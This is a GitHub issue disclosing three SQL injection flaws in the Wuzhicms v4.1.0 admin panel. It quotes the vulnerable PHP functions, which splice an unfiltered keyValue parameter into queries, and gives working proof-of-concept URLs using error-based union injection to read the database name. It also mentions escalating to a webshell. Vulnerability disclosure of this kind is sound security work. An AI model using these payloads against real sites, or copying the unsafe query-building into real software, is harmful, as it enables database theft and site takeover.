Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There are 3 SQL injections in Wuzhicms v4.1.0 background #198

Open
tcyba opened this issue Sep 6, 2021 · 0 comments
Open

There are 3 SQL injections in Wuzhicms v4.1.0 background #198

tcyba opened this issue Sep 6, 2021 · 0 comments

Comments

@tcyba
Copy link

tcyba commented Sep 6, 2021

There are 3 SQL injections in Wuzhicms v4.1.0 background

one

Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability

Vulnerability file:

/coreframe/app/pay/admin/index.php 30-98

	public function listing(){
		$fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
		$keytype = isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0;
		$payments = $this->payments;
		$status_arr = $this->status_arr;
		$page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
		$page = max($page, 1);
		$status = $GLOBALS['status'];

		if ($status) {
			$where = 'status=' . $status;
		} else {
			$where = 'status>0';
		}
		if ($keytype) {
			$where .= " AND `keytype`='$keytype'";
		}
		$keyValue = strip_tags($GLOBALS['keyValue']);
		$fieldtype = intval($GLOBALS['fieldtype']);
		if ($keyValue) {
			switch ($fieldtype) {
				case 0:
					$where .= " AND `order_no`='$keyValue'";
					break;
				case 1:
					$where .= " AND `telephone`='$keyValue'";
					break;
				case 2:
					$where .= " AND `kf_username`='$keyValue'";
					break;
				case 3:
					$where .= " AND `jxs_username`='$keyValue'";
					break;
			}
		}

		if ($_SESSION['role'] == 4) {
			//客服
			$kf_username = get_cookie('username');
			$where .= " AND `kf_username`='$kf_username'";
		}
		$starttime = '';
		$endtime = '';
		if ($GLOBALS['starttime']) {
			$starttime = strtotime($GLOBALS['starttime']);
			$where .= " AND `addtime`>'$starttime'";
		}
		if ($GLOBALS['endtime']) {
			$endtime = strtotime($GLOBALS['endtime']);
			$where .= " AND `endtime`<'$endtime'";
		}
		if(isset($GLOBALS['exp'])) {
			$pagesize = 1000;
		} else {
			$pagesize = 20;
		}

		$admin_result = $this->db->get_list('admin', array('role' => 4), '*', 0, 20, 0);
		$result = $this->db->get_list('pay', $where, '*', 0, $pagesize, $page, 'id DESC');
		if(isset($GLOBALS['exp'])) {
			$this->export_excel($result);
		}
		$pages = $this->db->pages;
		$total = $this->db->number;
		$pay_config = get_config('pay_config');
		load_class('form');

		include $this->template('listing');
	}

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

/index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -

image-20210906122319748

image-20210906122347848

two

The second SQL injection and the first SQL injection are in a different function in the same file!

Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability

Vulnerability file:

/coreframe/app/pay/admin/index.php 244-289

public function relay(){
		$id = intval($GLOBALS['id']);
		$r = $this->db->get_one('pay', array('id' => $id));
		$r2 = $this->db->get_one('pay_detail', array('id' => $id));
		$r = array_merge($r, $r2);
		$keyValue = '';
		$keyType = '';
		if (isset($GLOBALS['keyType'])) {
			$keyType = $GLOBALS['keyType'];
			$keyValue = $GLOBALS['keyValue'];
			if ($keyValue) {
				$where = "modelid=11 AND `$keyType` LIKE '%$keyValue%'";
				$result = $this->db->get_list('member', $where, '*', 0, 20, 0, 'uid DESC');
			}
		} elseif (isset($GLOBALS['submit'])) {
			load_function('common', 'pay');
			$formdata = array();
			$formdata['order_no'] = create_order_no();
			$formdata['to_uid'] = intval($GLOBALS['to_uid']);
			$formdata['username'] = $r['linkman'];
			$formdata['mobile'] = $r['telephone'];
			$formdata['pinpai'] = $r['data1'];
			$formdata['chexing'] = $r['data3'];
			$formdata['addtime'] = $r['addtime'];
			$formdata['keytype'] = 0;//游客订单
			$formdata['zftime'] = SYS_TIME;
			$this->db->insert('demand_relay', $formdata);
			$formdata2 = array();
			$formdata2['op_uid'] = $_SESSION['uid'];
			$formdata2['to_uid'] = intval($GLOBALS['to_uid']);
			$formdata2['to_username'] = $GLOBALS['to_username'];
			$formdata2['updatetime'] = SYS_TIME;
			$this->db->insert('demand_history', $formdata2);
			// $this->db->update('demand', array('flag'=>1),array('did' => $did));
			$this->db->update('pay', array('jxs_username' => $formdata2['to_username']), array('id' => $id));
			$forward = strip_tags($GLOBALS['forward']);
			MSG('发送成功', $forward);
		} else {
			$uid = $_SESSION['uid'];
			$where = "op_uid='$uid'";
			$data = $this->db->get_one('demand_history', $where, '*', 0, 'hid DESC');
			$forward = strip_tags($GLOBALS['forward']);

		}
		include $this->template('pay_relay');
	}

Set $keyType=uid and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

/index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -

image-20210906122742954

image-20210906123019431

three

Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability

Someone has submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php before (#175), but I found that in addition to the $flag parameter, it can be injected In addition, the $keyValue parameter can also be injected!

Vulnerability file:

coreframe/app/order/admin/index.php 22-87

public function listing() {
    load_class('form');
    $fieldtypes = array('订单ID','标题','下单会员','物流单号');
    $flag = $GLOBALS['flag'];
    $status = array();
    $status[1] = '待发货';
    $status[2] = '已发货';
    $status[3] = '订单完成';

    $status_arr = $this->status_arr;
    $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1;
    $page = max($page,1);
    $keyValue = strip_tags($GLOBALS['keyValue']);
    $fieldtype = intval($GLOBALS['fieldtype']);
    $where = '1';
    if($keyValue) {
        switch($fieldtype) {
            case 0:
                $where .= " AND `order_no`='$keyValue'";
                break;
            case 1:
                $where .= " AND `remark` LIKE '%$keyValue%'";
                break;
            case 2:
                $r = $this->db->get_one('member', array('username' => $keyValue));
                $uid = $r['uid'];
                $where .= " AND `uid`='$uid'";
                break;
            case 3:
                $where .= " AND `snid`='$keyValue'";
                break;
        }
    }
    if($flag!='' && $flag==0 || $flag) $where .=" AND `status`='$flag'";
    $starttime = '';
    $endtime = '';
    if($GLOBALS['starttime']) {
        $starttime = strtotime($GLOBALS['starttime']);
        $where .= " AND `addtime`>'$starttime'";
    }
    if($GLOBALS['endtime']) {
        $endtime = strtotime($GLOBALS['endtime']);
        $where .= " AND `addtime`<'$endtime'";
    }
    $result_arr = $this->db->get_list('order_point', $where, '*', 0, 20,$page,'orderid DESC');

Set $fieldtype=1 and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

POC

http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1

image-20210906162438475

image-20210906162501868

Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file.
https://github.com/wuzhicms/wuzhicms/issues/198

Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198)

Use sql injection to elevate permissions and write webshell
Individual
@tcyba tcyba changed the title There are 3 SQL injections in Wuzhicms v4.1.0 background 1 Sep 13, 2021
@tcyba tcyba closed this as completed Sep 13, 2021
@tcyba tcyba changed the title 1 There are 3 SQL injections in Wuzhicms v4.1.0 background Sep 13, 2021
@tcyba tcyba reopened this Sep 21, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant